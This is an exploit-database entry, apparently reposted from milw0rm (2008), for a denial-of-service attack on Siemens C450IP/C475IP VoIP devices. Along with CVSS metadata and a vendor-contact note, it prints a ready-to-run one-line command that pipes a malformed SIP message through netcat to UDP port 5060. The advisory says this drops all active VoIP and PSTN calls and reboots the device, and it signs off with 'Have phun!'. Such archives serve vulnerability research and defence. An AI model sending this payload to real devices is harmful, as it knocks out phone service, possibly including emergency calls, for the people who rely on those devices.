header-logo
Suggest Exploit
vendor:
C450IP/C475IP
by:
sky & Any
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: C450IP/C475IP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

Disconnect all current VOIP and PSTN calls and reboot the C450IP/C475IP devices

This exploit will disconnect all current VOIP and PSTN calls and reboot the C450IP/C475IP devices by sending a specially crafted packet to the target device.

Mitigation:

Vendor (Siemens) was contacted 11/2007, no fix supplied yet.
Source

Exploit-DB raw data:

Hi,

echo -e "X sip:s X\nFrom:<sip:@x>\nTo:<sip:@x>\n" | nc -q0 -u <target> 5060

Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.

Tested with current firmwares.

Vendor (Siemens) was contacted 11/2007, no fix supplied yet.

Have phun!

sky & Any

# milw0rm.com [2008-11-24]